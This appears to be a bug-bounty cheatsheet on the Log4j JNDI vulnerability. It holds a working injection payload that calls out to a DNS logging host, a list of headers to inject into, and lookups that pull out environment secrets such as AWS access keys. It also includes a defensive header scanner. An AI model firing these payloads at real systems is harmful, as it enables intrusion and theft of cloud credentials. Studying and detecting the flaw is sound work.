Anton

Log4j Vulnerability Cheatsheet

Description

The Java logging library log4j has an unauthenticated remote code execution (RCE) vulnerability, CVE-2021-44228, that is triggered when a user-controlled string containing a `${jndi:...}` lookup is logged.

Affected versions: Apache log4j 2.0-beta9 through 2.14.1

How It Works

A specially crafted payload is injected into headers, input fields, or query/body parameters, for example:

```
https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
```

  1. You can use a service such as dnslog.cn to create a DNS subdomain for the test. Example: qwe3er.dnslog.cn

  2. Use this subdomain to craft the payload and send it with the request. After some time, check the DNS service for the callback that confirms the lookup was triggered.

  3. You should see a request to the DNS service carrying the host name and Java version, e.g. jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use the provided test environments to inspect the behavior of this vulnerability.

Challenges & Labs (Rooms)

You can use the challenges and labs (rooms) listed here for practice.

How To Identify (Services)

Use these websites to create a DNS address (token) for the payload.

How To Identify (Scanners)

Use these scanners to check whether a target website is vulnerable.

List of Places where the Payload can be Injected

Email header, username, password, e-mail address, filename, query/body, file content, document/image EXIF, or inside any of these headers:

```
Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token
```

What Information can be Extracted

```
${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
```
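As an added example (not part of the original post), here is a small Python scanner written from the defender's side: it walks the nested `${...}` lookups in request headers, flags JNDI lookups, and lists which of the sys:/env:/hostName values above the payload would resolve and carry out. The header names follow the list above; the header values and the collector.example host are constructed samples.

```python
# Constructed sample request headers (not captured traffic). Names come from the
# header list above; the first value is the payload shape from the post, the
# second a constructed variant; "collector.example" is a placeholder host.
SAMPLE_HEADERS = {
    "User-Agent": "${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}",
    "X-Api-Version": "${jndi:ldap://collector.example/${env:AWS_SECRET_ACCESS_KEY}}",
    "Referer": "https://shop.example/cart",
    "Cookie": "session=abc123",
}


def parse_lookups(value):
    """Return (body, depth) for every ${...} in value, depth 0 = outermost.
    A stack of start offsets lets nested lookups like ${a:${b:c}} be reported
    individually (inner ones first, since they close first)."""
    stack, found, i = [], [], 0
    while i < len(value):
        if value.startswith("${", i):
            stack.append(i + 2)
            i += 2
            continue
        if value[i] == "}" and stack:
            found.append((value[stack.pop():i], len(stack)))
        i += 1
    return found


def analyse_value(value):
    """Split one header value's lookups into JNDI triggers and the sys:/env:/
    hostName lookups that log4j would resolve before the JNDI request is sent,
    i.e. the values that would leave the host."""
    report = {"jndi": [], "leaks": []}
    for body, _depth in parse_lookups(value):
        prefix = body.split(":", 1)[0].strip().lower()
        if prefix == "jndi":
            report["jndi"].append(body)
        elif prefix in {"sys", "env", "hostname"}:
            report["leaks"].append(body)
    return report


def scan_headers(headers):
    """Return findings only for headers carrying a JNDI or leak lookup."""
    findings = {}
    for name, value in headers.items():
        report = analyse_value(value)
        if report["jndi"] or report["leaks"]:
            findings[name] = report
    return findings
```

Running `scan_headers(SAMPLE_HEADERS)` reports User-Agent and X-Api-Version and leaves Referer and Cookie untouched; the same function can be pointed at parsed access-log or WAF records.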

Video Edition is available on

Static Version Shared On

That's all for now

  1. Share the word about this article
  2. Follow me @therceman

I tweet & write about Bug Bounty Hunting
Cheers, Happy Hunting 👍
